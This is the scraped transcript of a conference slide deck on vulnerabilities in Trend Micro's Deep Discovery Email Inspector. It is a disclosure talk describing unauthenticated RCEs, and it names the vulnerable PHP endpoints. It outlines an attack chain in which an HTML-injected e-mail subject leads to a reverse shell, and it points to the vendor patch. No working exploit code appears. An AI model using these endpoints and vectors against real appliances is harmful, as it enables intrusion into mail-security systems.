Exploiting  e-mail sandbox
4K - views

Exploiting e-mail sandbox

backdoor it with one evil e-mail. Nikolay Klendar. b. sploit gmail.com. Head of IT Security at . Offensive Security Certified Expert. Not a bug hunter. Hobbies:. programming. kitesurfing, snowboarding.

Download Presentation

Exploiting e-mail sandbox




Download Presentation - The PPT/PDF document " Exploiting e-mail sandbox" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.



Presentation on theme: " Exploiting e-mail sandbox"— Presentation transcript:

Slide1

Exploiting e-mail sandbox

backdoor it with one evil e-mail

Nikolay Klendarbsploit gmail.com

Slide2

Head of IT Security at Offensive Security Certified ExpertNot a bug hunterHobbies:programmingkitesurfing, snowboarding

Who am I

Slide3

DDEI Implementation scheme

Access to Web UI could be restricted

Slide4

Source Code Analysis

Slide5

WhiteBox

Analysis. Admin UI RCE

Conditions:No authentication requiredNo CSRF protection

Slide6

Multiple RCEs

/hidden/firewall_setting/firewall_setting.php/hidden/db_export/db_export.php/hidden/network_dump/php/network_dump.php/hidden/kdump/php/kdump_setting.php/hidden/url_extract/url_extract.php/hidden/url_filter/url_filter.php/hidden/postfix_setting/postfix_setting.php/admin/php/network_setting.php/report/report_ui/php/report_setting.php

/

usandbox

/

import_native_sandbox.php

/

php

/

screenshot.php

/

php

/

syslog_setting.php

/

detections/

download_pdf.php

/detections/

write_new_html_with_svg.php

get_filesize.php

ajax_checklicense_AC.php

Slide7

Potential vectors of compromise

Direct

request from management

network

Place

<img src=“https://ddei/vuln_script.php”> at own site and wait for

admin

Something

more interesting?

Slide8

GrayBox Analysis. HTML injection

Slide9

Possible attack scenario

1

.

Attacker:

creates

an

email with malicious content (link or

attachment

) and puts exploit in

to subject

2. Admin: opens Dashboards

-

>Trends tab. Exploit runs without additional

user interaction

3. Reverse shell from

SandBox

to attacker C&C

=> full compromise with root privileges

Slide10

Connecting Sandbox to C&C

Slide11

Critical Patch

https://

success.trendmicro.com/solution/1116750-security-bulletin-multiple-vulnerabilities

-in-trend-micro-deep-discovery-email-inspector-ddei-2-5

Slide12

Conclusion

16 RCEs with CVSS 10 were reported and confirmed by vendorHarden even security systemsImplement source code analysis in SDLC

Join to HCFB security team: bsploit gmail.com